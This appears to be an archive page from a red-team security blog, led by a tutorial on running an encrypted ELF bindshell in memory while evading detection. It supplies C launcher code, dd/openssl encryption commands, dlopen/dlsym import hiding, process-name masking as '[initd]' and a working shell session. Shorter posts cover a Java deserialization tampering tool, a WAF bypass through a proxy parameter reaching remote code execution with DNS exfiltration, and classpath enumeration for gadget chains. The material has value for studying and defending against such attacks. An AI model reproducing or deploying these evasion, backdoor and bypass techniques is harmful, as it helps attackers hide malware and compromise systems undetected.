Archives February 2020

Blue Team vs Red Team: how to run your encrypted ELF binary in memory and go undetected

Imagine finding yourself in a “hostile” environment, one where you can’t run exploits, tools and applications without worrying about prying eyes spying on you, be it a legitimate system administrator, a colleague sharing access with you or a software solution that scans the machine you are logged in to for malicious files. Your binary should live in encrypted form in the filesystem, so that no static analysis is possible even if it is identified and copied somewhere else. It should be decrypted on the fly in memory only when executed, thus preventing dynamic analysis too, unless the decryption key is known.

How to implement that?

On paper everything looks fine, but how do we implement this in practice? At Red Timmy Security we have created the “golden frieza” project, a collection of several techniques supporting on-the-fly encryption/decryption of binaries. Even though we are not yet ready to release the full project, we are going to discuss one of the methods it implements in depth, accompanied by some supporting source code.

Why is the discussion relevant to security analysts working in SOC departments, Threat Intelligence and Red Teams alike? Think about a typical Red Team operation, in which tools that commonly trigger security alerts to the SOC, such as “procmon” or “mimikatz”, are uploaded to a compromised machine and then launched without the installed endpoint protection solutions or EDR agents complaining about it. Alternatively, think about a zero-day privilege escalation exploit that an attacker wants to run locally on a freshly compromised system, without it being reverse engineered while stored in the filesystem and consequently divulged to the rest of the world.

These are exactly the kinds of techniques we are going to talk about.

A short premise before we get started: all the examples and code released (github link) work with ELF binaries. Conceptually there is nothing preventing you from implementing the same techniques with Windows PE binaries, of course with the appropriate adjustments.

What to encrypt?

An ELF binary file is composed of multiple sections. We are mostly interested in encrypting the “.text” section, where the instructions that the CPU executes are located once the interpreter maps the binary in memory and transfers execution control to it. To put it simply, the “.text” section contains the logic of our application that we do not want to be reverse-engineered.
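Instead of reading the numbers off “readelf”, the “.text” offset and size can also be located programmatically by walking the section header table. A minimal sketch for ELF64 on Linux (error handling kept short; not part of the golden frieza code itself):

```c
/* Locate the ".text" section of an ELF64 file and return its file offset,
 * writing its size to *size_out -- the same numbers "readelf -S" reports. */
#include <elf.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

long find_text_section(const char *path, long *size_out)
{
    FILE *f = fopen(path, "rb");
    if (!f) return -1;

    Elf64_Ehdr ehdr;
    if (fread(&ehdr, sizeof ehdr, 1, f) != 1) { fclose(f); return -1; }

    /* read the section header table */
    Elf64_Shdr *shdrs = malloc(ehdr.e_shnum * sizeof *shdrs);
    fseek(f, (long)ehdr.e_shoff, SEEK_SET);
    fread(shdrs, sizeof *shdrs, ehdr.e_shnum, f);

    /* read the section-name string table */
    Elf64_Shdr *strtab = &shdrs[ehdr.e_shstrndx];
    char *names = malloc(strtab->sh_size);
    fseek(f, (long)strtab->sh_offset, SEEK_SET);
    fread(names, 1, strtab->sh_size, f);

    long off = -1;
    for (int i = 0; i < ehdr.e_shnum; i++) {
        if (strcmp(names + shdrs[i].sh_name, ".text") == 0) {
            off = (long)shdrs[i].sh_offset;
            if (size_out) *size_out = (long)shdrs[i].sh_size;
            break;
        }
    }
    free(names); free(shdrs); fclose(f);
    return off;
}
```

Feeding it any ELF64 binary yields the file offset and length you would otherwise copy by hand from the “readelf” output.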

Which crypto algorithm to use?

To encrypt the “.text” section we will avoid block ciphers, which would force the binary instructions in that section to be aligned to the block size. A stream cipher fits perfectly in this case, because the ciphertext produced in output has the same length as the plaintext, hence there are no padding or alignment requirements to satisfy. We choose RC4 as the encryption algorithm. The discussion of its security is beyond the scope of this blog post; you can substitute whatever algorithm you prefer.
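For reference, RC4 is small enough to inline in a launcher. A minimal implementation (KSA + PRGA), computing the same keystream as the “openssl rc4” commands used later:

```c
/* Minimal RC4: key-scheduling (KSA) + keystream generation (PRGA).
 * Being a stream cipher, output length == input length, and the same
 * function performs both encryption and decryption. */
#include <stddef.h>

void rc4(const unsigned char *key, size_t keylen,
         const unsigned char *in, unsigned char *out, size_t len)
{
    unsigned char S[256];
    size_t i, j, n;

    for (i = 0; i < 256; i++) S[i] = (unsigned char)i;     /* KSA */
    for (i = 0, j = 0; i < 256; i++) {
        j = (j + S[i] + key[i % keylen]) & 0xff;
        unsigned char t = S[i]; S[i] = S[j]; S[j] = t;
    }
    for (n = 0, i = 0, j = 0; n < len; n++) {              /* PRGA */
        i = (i + 1) & 0xff;
        j = (j + S[i]) & 0xff;
        unsigned char t = S[i]; S[i] = S[j]; S[j] = t;
        out[n] = in[n] ^ S[(S[i] + S[j]) & 0xff];
    }
}
```

Because encryption and decryption are the same XOR operation, the launcher only needs this one routine to turn the encrypted “.text” bytes back into valid instructions.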

The implementation

The technique to be implemented must be as simple as possible. We want to avoid manual memory mappings and symbol relocations. For example, our solution could rely on two components:

  • an ELF file compiled as a dynamic library, exporting one or more functions containing the encrypted instructions to be protected from prying eyes;
  • the launcher, a program that takes the ELF dynamic library as input, decrypts it in memory by means of a crypto key and then executes it.

What is not clear yet is what we should encrypt: the full “.text” section or just the malicious functions exported by the ELF module? Let’s run an experiment. The following source code exports a function called “testalo()” taking no parameters. After compilation we want it to be decrypted only once it is loaded in memory.
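The listing referenced above appears as an image in the original post; a minimal sketch of “testalo_mod.c”, consistent with the launcher output reproduced later, looks like this:

```c
/* testalo_mod.c -- sketch of the dummy module: a single exported
 * function with no parameters, whose only logic is printing the
 * strings seen later in the launcher output. */
#include <stdio.h>

void testalo(void)
{
    printf("Sucalo Sucalo oh oh!\n");
    printf("oh oh Sucalo Sucalo!!\n");
}
```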

We compile the code as a dynamic library:

$ gcc testalo_mod.c -o -shared -fPIC

Now let’s have a look at its sections with “readelf”:

The “.text” section in the present case starts at file offset 0x580 (1408 bytes from the beginning of the file) and its size is 0x100 (256 bytes). What if we fill up this space with zeros and then try to programmatically load the library? Will it be mapped into our process memory, or will the interpreter have something to complain about? As the encryption procedure turns that section into garbage binary instructions, filling up the “.text” section of our module with zeros simulates the same condition without actually encrypting the binary. We can do that by executing the command:

$ dd if=/dev/zero seek=1408 bs=1 count=256 conv=notrunc

…and then verifying with “xxd” that the “.text” section has been indeed entirely zeroed:

$ xxd
00000580: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000590: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000670: 0000 0000 0000 0000 0000 0000 0000 0000 ................

To observe the final behavior we are after, we need an application (see the code snippet of “dlopen_test.c” below) that tries to map the “” module into its address space (line 12) and then, in case of success, checks whether at runtime the function “testalo()” gets resolved (line 18) and executed (line 23).
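The full “dlopen_test.c” listing (with the line numbering referenced above) is shown as an image in the original post; a minimal equivalent of its logic is sketched here, with the flow factored into a function so it is easy to test:

```c
/* Sketch of dlopen_test.c: map the module with dlopen(), resolve the
 * exported "testalo" symbol with dlsym(), then call it. Returns 0 on
 * success, non-zero on any failure. */
#include <dlfcn.h>
#include <stdio.h>

int run_module(const char *path)
{
    void *handle = dlopen(path, RTLD_LAZY);        /* map the library */
    if (!handle) {
        fprintf(stderr, "dlopen: %s\n", dlerror());
        return 1;
    }

    void (*testalo)(void) = (void (*)(void))dlsym(handle, "testalo");
    if (!testalo) {
        fprintf(stderr, "dlsym: %s\n", dlerror());
        dlclose(handle);
        return 2;
    }

    testalo();                                     /* execute the payload */
    dlclose(handle);
    return 0;
}
```

Compile with `-ldl` on older glibc versions (on glibc 2.34+ the dl* functions live in libc itself).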

Let’s compile and execute it:

$ gcc dlopen_test.c -o dlopen_test -ldl
$ ./dlopen_test
Segmentation fault (core dumped)

What we are observing here is that the program crashes during the execution of line 12. Why? This happens because, even if the call to “dlopen()” in our application is not explicitly invoking anything from “”, there are functions inside “” itself that are automatically called (such as “frame_dummy()”) during the module initialization process. A “gdb” session will help here.

$ objdump -M intel -d

Because such functions are all zeroed, a segmentation fault is produced when the execution flow is transferred to them.

What if we only encrypted the content of the “testalo()” function, where our logic resides? To do that we just recompile “” and determine the size of the function’s code with the command “objdump -M intel -d“, by observing where the function starts and where it ends:

The formula to calculate our value is 0x680 - 0x65a = 0x26 = 38 bytes.

Finally, we overwrite the library “” with 38 bytes of zeros, starting from where the “testalo()” function is located, which this time is at offset 0x65a (1626 bytes from the beginning of the file):

$ dd if=/dev/zero seek=1626 bs=1 count=38 conv=notrunc

Then we can launch “dlopen_test” again:

$ ./dlopen_test
Segmentation fault (core dumped)

It seems nothing has changed. But a closer look reveals the segfault has occurred for another reason this time:

Previously we got stuck at line 12 in “dlopen_test.c”, during the initialization of the “” dynamic library. Now instead we get stuck at line 23: “” has been properly mapped into our process memory, the “testalo()” symbol has already been resolved from it (line 18) and the function is finally invoked (line 23), which in turn causes the crash. Of course the binary instructions are invalid, because we zeroed that block of memory earlier. However, if we had really put encrypted instructions there and decrypted them all before the invocation of “testalo()”, everything would have worked smoothly.

So, we know now what to encrypt and how to encrypt it: only the exported functions holding our malicious payload or application logic, not the whole text section.

Next step: a first prototype for the project

Let’s see a practical example of how to decrypt in memory our encrypted payload. We said at the beginning that two components are needed in our implementation:

  • (a) an ELF file compiled as a dynamic library, exporting one or more functions containing the encrypted instructions to be protected from prying eyes;
  • (b) the launcher, a program that takes the ELF dynamic library as input, decrypts it in memory by means of a crypto key and then executes it.

Regarding point (a), we will continue to use “” for now, encrypting the content of the “testalo()” function only. Instead of writing a specific program for that, we just take advantage of existing tools such as “dd” and “openssl”:

$ dd if=./ of=./text_section.txt skip=1626 bs=1 count=38

$ openssl rc4 -e -K 41414141414141414141414141414141 -in text_section.txt -out text_section.enc -nopad

$ dd if=./text_section.enc of=./ seek=1626 bs=1 count=38 conv=notrunc

The first command extracts the 38 bytes composing the binary instructions of “testalo()”. The second command encrypts them with the RC4 key “AAAAAAAAAAAAAAAA” (hex representation -> “41414141414141414141414141414141”) and the third command writes the encrypted content back to the place where “testalo()” is located in the binary. If we now look at the code of that function with the command “objdump -M intel -d ./“, it is indeed unintelligible:

The second needed component is the launcher (b). Let’s analyze its C code piece by piece. First it acquires, in hexadecimal format, the offset where our encrypted function is mapped (information that we retrieve with “readelf”) and its length in bytes (line 102). Then the terminal echo is disabled (lines 116-125) so the user can safely type in the crypto key (line 128), and finally the terminal is restored to its original state (lines 131-135).

Now we have the offset of our encrypted function, but we do not yet know the full memory address where it is mapped. This is determined by looking at “/proc/PID/maps”, as in the code snippet below.
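The launcher’s snippet is shown as an image in the original post; a short sketch of the same “/proc” lookup (here against our own mappings via /proc/self/maps) could look like this:

```c
/* Find the base address of a loaded module by scanning /proc/self/maps.
 * "needle" is a substring of the mapping's pathname, e.g. the module's
 * filename. The first matching line gives the start of the mapping. */
#include <stdio.h>
#include <string.h>

unsigned long module_base(const char *needle)
{
    FILE *f = fopen("/proc/self/maps", "r");
    if (!f) return 0;

    char line[512];
    unsigned long start = 0, end = 0;
    while (fgets(line, sizeof line, f)) {
        if (strstr(line, needle)) {
            /* lines look like: 7feb51c56000-7feb51c57000 r-xp ... /path */
            sscanf(line, "%lx-%lx", &start, &end);
            break;
        }
    }
    fclose(f);
    return start;
}
```

Adding the file offset of the encrypted function to this base address yields the exact memory location to patch.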

Then all the pieces are in place to extract the encrypted binary instructions from memory (line 199), decrypt everything with the RC4 key collected previously and write the output back to the location where the “testalo()” function’s content lives (line 213). However, we could not do that without first marking that page of memory as writable (lines 206-210) and then making it readable/executable only again (lines 218-222) after the decrypted payload is written into it. This is because, in order to protect the executable code against tampering at runtime, the interpreter loads it into a non-writable memory region. After usage, the crypto key is also wiped from memory (line 214).

Now the address of the decrypted “testalo()” function can be resolved (line 228) and the binary instructions it contains be executed (line 234).

This first version of the launcher’s source code is downloadable from here. Let’s compile it…

$ gcc golden_frieza_launcher_v1.c -o golden_frieza_launcher_v1 -ldl

…execute it, and see how it works (in bold the user input):

$ ./golden_frieza_launcher_v1 ./
Enter offset and len in hex (0xXX): 0x65a 0x26
Offset is 1626 bytes
Len is 38 bytes
Enter key: <-- key is inserted here but not echoed back
PID is: 28527
Module name is:
7feb51c56000-7feb51c57000 r-xp 00000000 fd:01 7602195 /tmp/
Start address is: 0x7feb51c56000
End address is 0x7feb51c57000

Execution of .text
Sucalo Sucalo oh oh!
oh oh Sucalo Sucalo!!

As shown at the end of the command output, the in-memory decrypted content of the “testalo()” function is indeed successfully executed.


What is the problem with this approach? Even if our library is stripped, the symbols of the functions invoked by “testalo()” (such as “puts()” and “exit()”), which need to be resolved and relocated at runtime, remain well visible. If the binary ends up in the hands of a system administrator or SOC analyst, even with the “.text” section encrypted in the filesystem, simple static analysis tools such as “objdump” and “readelf” would let them infer the purpose of our malicious binary.

Let’s see it with a more concrete example. Instead of using a dummy library, we decide to implement a bindshell (see the code here) and compile it as an ELF module:

$ gcc testalo_bindshell.c -o -shared -fPIC

We strip the binary with the “strip” command and encrypt the relevant “.text” portion as already explained. If we now look at the symbol table (“readelf -s”) or relocation table (“readelf -r”), something very similar to the picture below appears:

This clearly reveals the usage of APIs such as “bind()”, “listen()”, “accept()”, “execl()”, etc., which are all functions that a bindshell implementation typically imports. This is inconvenient in our case because it reveals the nature of our code. We need a workaround.

dlopen and dlsym

To get around the problem, the approach we adopt is to resolve external symbols at runtime through “dlopen()” and “dlsym()”.

For example, normally a snippet of code involving a call to “socket()” would look like this:

if((srv_sockfd = socket(PF_INET, SOCK_STREAM, 0)) < 0)

When the binary is compiled and linked, the piece of code above is responsible for the creation of an entry for “socket()” in the dynamic symbol and relocation tables. As already said, we want to avoid that. Therefore the piece of code above must be changed as follows:

Here “dlopen()” is invoked only once and “dlsym()” is called for every external function that must be resolved. In practice:

  • “int (*_socket)(int, int, int);” -> we define a function pointer variable having the same prototype as the original “socket()” function.
  • “handle = dlopen(NULL, RTLD_LAZY);” -> “if the first parameter is NULL the returned handle is for the main program”, as stated in the linux man page.
  • “_socket = dlsym(handle, "socket");” -> the variable “_socket” will contain the address of the “socket()” function resolved at runtime with “dlsym()”.
  • “(*_socket)(PF_INET, SOCK_STREAM, 0)” -> we use it as an equivalent form of “socket(PF_INET, SOCK_STREAM, 0)”. Basically the value stored in the variable “_socket” is the address of the “socket()” function that has been resolved with “dlsym()”.

These modifications must be repeated for all the external functions: “bind()”, “listen()”, “accept()”, “execl()”, etc.
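Putting the bullets together, the runtime-resolution pattern for “socket()” looks like this (a sketch of the pattern, not the exact code of the modified library):

```c
/* Resolve socket() by name at runtime instead of link time, so no
 * "socket" entry appears in the dynamic symbol/relocation tables --
 * only dlopen/dlsym remain visible. */
#include <dlfcn.h>
#include <sys/socket.h>
#include <unistd.h>

int make_socket(void)
{
    int (*_socket)(int, int, int);            /* same prototype as socket() */

    void *handle = dlopen(NULL, RTLD_LAZY);   /* NULL -> handle to main program */
    if (!handle)
        return -1;

    _socket = (int (*)(int, int, int))dlsym(handle, "socket");
    if (!_socket)
        return -1;

    /* equivalent of socket(PF_INET, SOCK_STREAM, 0) */
    return (*_socket)(PF_INET, SOCK_STREAM, 0);
}
```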

You can see the differences between the two coding styles by comparing the UNMODIFIED BINDSHELL LIBRARY and the MODIFIED ONE. After that, the new library is compiled:

$ gcc testalo_bindshell_mod.c -o -shared -fPIC

…the main effects tied to the change of coding style are the following:

In practice, the only external symbols that remain visible now are “dlopen()” and “dlsym()”. No usage of any other socket API or function can be inferred.

Is this enough?

This approach has some issues too. To understand that, let’s have a look at the read-only data section in the ELF dynamic library:

What’s going on? All the strings we declared in our bindshell module have ended up in cleartext inside the “.rodata” section (starting at offset 0xaf5 and ending at offset 0xbb5), which contains all the constant values declared in the C program! Why is this happening? It comes down to the way we pass string parameters to the external functions:

_socket = dlsym(handle, "socket");

What we can do to get around the issue is to encrypt the “.rodata” section as well, and decrypt it on the fly in memory when needed, as we have already done with the binary instructions in the “.text” section. The new version of the launcher component (golden_frieza_launcher_v2) can be downloaded here and compiled with “gcc golden_frieza_launcher_v2.c -o golden_frieza_launcher_v2 -ldl”. Let’s see how it works. First the “.text” section of our bindshell module is encrypted:

$ dd if=./ of=./text_section.txt skip=1738 bs=1 count=1055

$ openssl rc4 -e -K 41414141414141414141414141414141 -in text_section.txt -out text_section.enc -nopad

$ dd if=./text_section.enc of=./ seek=1738 bs=1 count=1055 conv=notrunc

Same thing for the “.rodata” section:

$ dd if=./ of=./rodata_section.txt skip=2805 bs=1 count=193

$ openssl rc4 -e -K 41414141414141414141414141414141 -in rodata_section.txt -out rodata_section.enc -nopad

$ dd if=./rodata_section.enc of=./ seek=2805 bs=1 count=193 conv=notrunc

Then the launcher is executed. It takes the bindshell module filename (now with both the “.text” and “.rodata” sections encrypted) as a parameter:

$ ./golden_frieza_launcher_v2 ./

The “.text” section offset and length are passed as hex values (we have already seen how to get those):

Enter .text offset and len in hex (0xXX): 0x6ca 0x41f
Offset is 1738 bytes
Len is 1055 bytes

Next, the “.rodata” section offset and length are passed as hex values too. As seen in the last “readelf” screenshot above, in this case the section starts at 0xaf5 and the length is calculated as 0xbb5 - 0xaf5 + 1 = 0xc1:

Enter .rodata offset and len in hex (0xXX): 0xaf5 0xc1
.rodata offset is 2805 bytes
.rodata len is 193 bytes

Then the launcher asks for a command line parameter. Indeed, our bindshell module (specifically the exported “testalo()” function) takes as an input parameter the TCP port it has to listen on. We choose 9000 for this example:

Enter cmdline: 9000
Cmdline is: 9000

The encryption key (“AAAAAAAAAAAAAAAA”) is now inserted without being echoed back:

Enter key:

The final part of the output is:

PID is: 3915
Module name is:
7f5d0942f000-7f5d09430000 r-xp 00000000 fd:01 7602214 /tmp/
Start address is: 0x7f5d0942f000
End address is 0x7f5d09430000

Execution of .text

This time we get nothing below the “Execution of .text” message. This is due to the behavior of our bindshell, which does not print anything to standard output. However, the bindshell backdoor has been launched properly in the background:

$ netstat -an | grep 9000
tcp        0      0*               LISTEN

$ telnet localhost 9000
Connected to localhost.
Escape character is '^]'.
python -c 'import pty; pty.spawn("/bin/sh")'
$ id
uid=1000(cippalippa) gid=1000(cippalippa_group)

Last old-school trick of the day

A fair question is: how does the process show up in the process list after the bindshell backdoor is executed?

$ ps -wuax
./golden_frieza_launcher_v2 ./

Unfortunately, the system owner could identify the process as malicious at first glance! This is not normally an issue if our code runs for a short amount of time. But what if we want to plant a backdoor or C&C agent for a longer period? In that case it would be convenient to mask the process somehow. That is exactly what the piece of code below (implemented in complete form here) does.
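The complete v3 code is linked above; the core of the trick is typically a combination of overwriting argv[0] (which is what “ps” displays) and setting the kernel thread name with prctl(). A sketch, not necessarily identical to the launcher’s implementation:

```c
/* Mask the process name the old-school way: clobber the cmdline buffer
 * that "ps" reads, and set the kernel comm name (max 15 chars) so that
 * /proc/PID/comm agrees with the fake name. */
#include <string.h>
#include <sys/prctl.h>

void mask_process(char *argv0, size_t argv0_space, const char *fake)
{
    /* "ps -wuax" shows the process cmdline, which starts at argv[0] */
    memset(argv0, 0, argv0_space);
    strncpy(argv0, fake, argv0_space - 1);

    /* tools reading /proc/PID/comm see the prctl name instead */
    prctl(PR_SET_NAME, fake, 0, 0, 0);
}
```

Called from main() as `mask_process(argv[0], strlen(argv[0]), "[initd]")`, this makes the entry in the process list look like a harmless system process.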

Let’s first compile the new version of the launcher binary:

$ gcc golden_frieza_launcher_v3.c -o golden_frieza_launcher_v3 -ldl

This time the launcher takes an additional parameter beyond the encrypted dynamic library filename: the name we want to assign to the process. In the example below, “[initd]” is used:

$ ./golden_frieza_launcher_v3 ./ "[initd]"

Indeed, by means of “netstat” we can spot the PID of the process (assuming the bindshell backdoor has started on TCP port 9876):

$ netstat -tupan | grep 9876
tcp        0      0*               LISTEN      19087

…and from the PID the actual process name:

$ ps -wuax | grep init
user 19087 0.0 0.0 8648 112 pts/5 S 19:56 0:00 [initd]

Well, now you know you should never trust the ps output! 🙂


What if somebody discovers the launcher binary and the encrypted ELF dynamic library in the filesystem? The encryption key is not known, hence nobody can decrypt and execute our payload.

What if the offset and length of the encrypted sections are entered incorrectly? In most cases this will lead to a segfault or illegal instruction and the consequent crash of the launcher component. Again, the code does not leak out.

Can this be done on a Windows machine? Well, if you think about “LoadLibrary()”, “LoadModule()” and “GetProcAddress()”, these API functions do the same as “dlopen()” and “dlsym()”.

That’s all for today!

Snafuz, snafuz!

Interactive modification of Java Serialized Objects with SerialTweaker

Today we release another Java tool from the Serially toolkit. It can be used for advanced Java deserialization attacks, when existing gadget chains don’t work or when there is a whitelist mechanism in place (like LookAheadDeserialization). In that case we have to work with the classes that are in the whitelist and thus accepted by the application. Instead of sending a gadget chain containing classes the application is not familiar with, the idea is to modify the existing serialized objects that are used by the application during normal operations.

WARNING! This tool will deserialize input that it is given. It is therefore vulnerable to deserialization attacks by definition. Please make sure the input you use is not malicious, and/or use the tool in an isolated sandboxed environment.

Example usage

The probability of achieving RCE this way is pretty small; in this kind of attack something like an authorization bypass is much more likely. Let’s discuss an example of how to perform the Java serialized object modification. Imagine an object that contains information about a user. It may contain values like ID, username and a reference to an object that defines roles and permissions. If we spot this object in serialized form on the wire, we can feed it to SerialTweaker in the following way:

We feed the Base64-encoded version of the serialized object directly on the command line as argument of ‘-b’. SerialTweaker will decode it to a raw serialized object and analyze it via a customized implementation of ObjectInputStream. This customized version captures all classes which are inside the serialized object, so we can create a list of classes that are needed to perform deserialization. Note that in order to deserialize the object locally, the Java runtime must have the required classes in the classpath. Therefore we use the same technique as with EnumJavaLibs: we keep a local repository of jar files and dynamically load what is needed.

Once the analysis is finished, SerialTweaker preloads the required libraries. The next step is to attempt deserialization. If it encounters a class that is present in multiple jar files, it will prompt the user to choose which library to load from. In our case the classes are directly traceable to the jar file “UserDb.jar”, so no prompt is shown. The big integers following the class names are the SerialVersionUIDs of the classes.

Modifying variables

When the object is deserialized, the contents of its class variables are printed. These are values which are normally encoded within the serialized object, and thus values that we can modify. Keep in mind that static and transient variables are not serialized by default. SerialTweaker will still print them and allow you to modify them, because the class may implement a writeObject() method that does serialize them. In the default case, however, modifying these values will have no effect because they are not serialized. A warning “(not serialized by default)” is printed after the variable output to remind the user of this behavior.

In our example, the 3rd field of the User class is a reference to a Roles object. SerialTweaker recognizes references and will print nested classes. The Roles class contains a boolean variable, which we would like to change to true.

Next, the user is prompted for any modifications to perform. We type the id of the field we want to change (3) and the new value for it (T, for true). SerialTweaker prints the modified version of the object to confirm the modification was successful. When we’re done making changes, the modified object is serialized and the Base64 output is printed to the user.

Modifying ViewState

An interesting subject for serialized object modification might be JSF viewstates. When configured to store state client-side, JSF websites ship a serialized object back and forth with every request. It’s usually a large object containing information about the state of UI elements. Changing these values might give an attacker the opportunity to bypass certain restrictions.

SerialTweaker has a special ‘viewstate mode’, which will grab and decrypt (with ‘-k’) the viewstate from a given URL. Use the ‘-v’ flag to supply the URL.


There are already existing tools out there that can modify serialized objects. The difference is that they work by modifying the serialized object directly, at a much lower level. That method is error-prone, because the serialized object contains various length fields and references which need to be updated accordingly. SerialTweaker can make much more advanced modifications, but this comes at a price: you need to have the classes in your classpath in order to be able to deserialize them. Modifying values inside custom classes is therefore not possible with this approach.

The local repository of jar files is expected in ~/.serially/jars and should be indexed using the indexer from the EnumJavaLibs project.


The tool is released on our GitHub page.

How to hack a company by circumventing its WAF through the abuse of a different security appliance and win bug bounties

Hey, wait! What do bug bounties and network security appliances have in common? Usually nothing! On the contrary, security appliances enable virtual patching practices and actively help reduce the number of bug bounties paid to researchers… but this is a reverse story: a bug bounty was paid to us thanks to a misconfigured security appliance. We are not going to reveal either the name of the affected company (except that it was a Fortune 500) or that of the vulnerable component. However, we will talk about the technique used, because it is astonishingly, disarmingly simple.

The observation

It all began by browsing what at that time we did not even know to be a valuable target; let us call it “https://targetdomain“. Almost by accident, we noticed that a subdomain responsible for authentication on that website exposed some CSS and Javascript resources attributable to a Java component well known to be vulnerable to RCE (Remote Code Execution).

The weird thing was that by browsing the affected endpoint (something like “https://auth.targetdomain/vulnerable_endpoint?param=malicious_RCE_payload“) we received an HTTP 404 reply from the server, which made us suspect the presence of a Web Application Firewall. Why should that particular endpoint not be reachable if the resources decorating it (like .css and .js files) are? This clearly made us believe we were in front of a WAF. After a few more requests, all blocked, we confirmed some kind of WAF rule was indeed preventing us from reaching the target endpoint.

The “weird” thing

By browsing one of the hosted applications (i.e. https://targetdomain/appname) we are invited to authenticate to “https://auth.targetdomain“. During the authentication process, we notice another strange thing: at a certain moment we are redirected to a URL like:


with “aHR0cHM6Ly90YXJnZXRkb21haW4vYXBwbmFtZQ==” clearly being a base64-encoded string. The base64 payload, after decoding, turned out to be nothing more than the URL we had originally requested access to before starting the authentication, that is “https://targetdomain/appname“.

But what was that “cfru” parameter actually? Some quick research online shows it is part of the Bluecoat web filtering technology, a well-known proxy server appliance. So this told us a bit more about the remote infrastructure: the HTTP requests we send to the target cross at least one WAF device and a Bluecoat proxy server before reaching the front-end web servers and application servers, as reconstructed below.

The idea

A light bulb lit up above our heads once we discovered that this “cfru” parameter was publicly accessible, namely that no authentication to the portal was required to pass our payload to it. Therefore we started to base64-encode URLs of external domains under our control and feed the “cfru” parameter with these strings. The hope was to trigger some kind of SSRF. What we got in the end was much better.

Unfortunately, at that specific moment in time, we did not receive back any HTTP requests. However, on our internet-exposed machines we could see the DNS resolution process started from “targetdomain”. It seemed outgoing TCP connections from the target website were prohibited; the only thing authorized was, as said, DNS traffic. So instead of trying to trigger SSRF requests to external hosts, we turned our attention to internal subdomains (https://auth.targetdomain, https://blog.targetdomain, https://www.targetdomain, etc.).

We started to base64-encode a few of these URLs into the “cfru” parameter and almost immediately noticed another weirdness. For some URLs we got an HTTP 302 redirect back; for some others we did not. In the latter case the HTTP body of the reply contained the HTML code of the requested resource, as if Bluecoat forwarded the request to the destination and returned its content back to us, acting as a web proxy. Most importantly, this behavior was also observed when we encoded in the “cfru” parameter the subdomain responsible for authentication to the portal (https://auth.targetdomain), namely the one we believed was hosting a Java component vulnerable to RCE.

The turning point

Here was the turning point! We made the following assumption. If the resource


is browsed directly, our HTTP request lands immediately on the WAF, where a rule is configured that recognizes the malicious attempt (the malicious payload pointed to by “param“) and sends back an HTTP 404 error, in fact blocking the attack.

But what if we encode in base64 the URL


which produces the following base64 string


and pass it to the “cfru” parameter as follows?


In our case:

  1. The request crossed the WAF, which had nothing to complain about.
  2. Then it arrived at the Bluecoat device, which in turn base64-decoded the “cfru” parameter and issued a GET request toward the internal host https://auth.targetdomain/vulnerable_endpoint?param=malicious_RCE_payload.
  3. This in turn triggered the vulnerability.


And bingo! We could see the output of our malicious payload (nothing more than the “hostname” command) exfiltrated via DNS (outgoing TCP connections to our host on the internet were blocked, as already said).

Furthermore, we played a bit with our malicious payload in order to have the output of our injected commands returned directly as part of the HTTP headers in the server reply.


There are at least two mistakes that can be spotted here:

  • The Bluecoat device was behaving as a request “forwarder” instead of responding with an HTTP redirect, as happened for other URLs (a redirect would have caused the subsequent client requests to be caught and blocked by the WAF).
  • There was no rule implemented at the WAF level that base64-decoded the “cfru” parameter before passing it to the Bluecoat device, in order to check whether or not the request’s content matched one of the blocking rules deployed in the WAF itself.

Good for us! We notified the vendor of the vulnerability straight away and they decided to award us a nice bug bounty!

The bottom line here is that virtual patching is fine if you need a bit of extra time before fixing a serious vulnerability. But if you use it in place of real patching, well, it is only a question of time before you get hacked.

If you want to know more about similar exploitation techniques and other web hacking tricks, check out our Blackhat Las Vegas courses on August 1-2 and 3-4, 2020, because this will be one of the topics covered there.

Remote Java classpath enumeration with EnumJavaLibs

Discovering a deserialization vulnerability is often pretty straightforward. When source code is available, it comes down to finding calls to readObject() and finding a way for user input to reach that function. In case we don’t have source code available, we can spot serialized objects on the wire by looking for binary blobs or base64-encoded objects (recognizable by ‘rO0..’). The hard part comes with exploitation. Sure, you can throw all the exploits from ysoserial at it and hope for the best, but if that doesn’t work there is not much else to try.

The big piece of information which is missing at this point, is information about the classpath of the remote application. If we know what libraries are loaded, we might be able to construct a gadget chain (or adjust the existing ysoserial exploit to match the version of the library on the remote application, for example). That’s where the idea of EnumJavaLibs comes from: just let it deserialize arbitrary objects from different (popular) 3rd party Java libraries. More specifically:

  1. Create a local database of the most common Java libraries
  2. For each of these libraries, find a class that is serializable
  3. Create an instance of this object, serialize it, and send it to the remote application
  4. If we get a ClassNotFoundException back, we know the library is not on the classpath
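Step 4 above is the core of the technique. A minimal, self-contained sketch (not EnumJavaLibs code) of how a deserialization attempt distinguishes a present class from an absent one — here the “missing” class is faked by renaming the class descriptor inside a serialized stream:

```java
import java.io.*;
import java.nio.charset.StandardCharsets;

public class CnfeDemo {
    // The probe logic: ClassNotFoundException => library absent
    static boolean classOnClasspath(byte[] probe) {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(probe))) {
            ois.readObject();
            return true;
        } catch (ClassNotFoundException e) {
            return false;            // class (and thus its library) is missing
        } catch (IOException e) {
            return true;             // class resolved, stream failed later
        }
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(baos)) {
            oos.writeObject(o);
        }
        return baos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        byte[] good = serialize(new java.util.Date());
        // Simulate a class that is not on our classpath by renaming the
        // class descriptor inside the serialized stream
        byte[] bad = new String(good, StandardCharsets.ISO_8859_1)
                .replace("java.util.Date", "java.util.Datf")
                .getBytes(StandardCharsets.ISO_8859_1);
        System.out.println("java.util.Date present: " + classOnClasspath(good));
        System.out.println("java.util.Datf present: " + classOnClasspath(bad));
    }
}
```

In the real scenario the roles are reversed: the remote application performs the deserialization, and we read the ClassNotFoundException (or its absence) out of the response.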

We have released the code of this project on GitHub, together with a tool that can build a database of libraries. You can download the pre-compiled version over here.


JMX/RMI is a perfect example where Java classpath enumeration can be done, as it meets the above conditions. When the endpoint is running a vulnerable Java version (that is, one predating the JEP 290 implementation), JMX/RMI endpoints are vulnerable by default (regardless of whether authentication is required). This is because a JMX/RMI endpoint exposes the RMIServerImpl_Stub.newClient(Object o) function, which deserializes any object provided (RMI functions that accept parameters of type Object should always be a red flag).

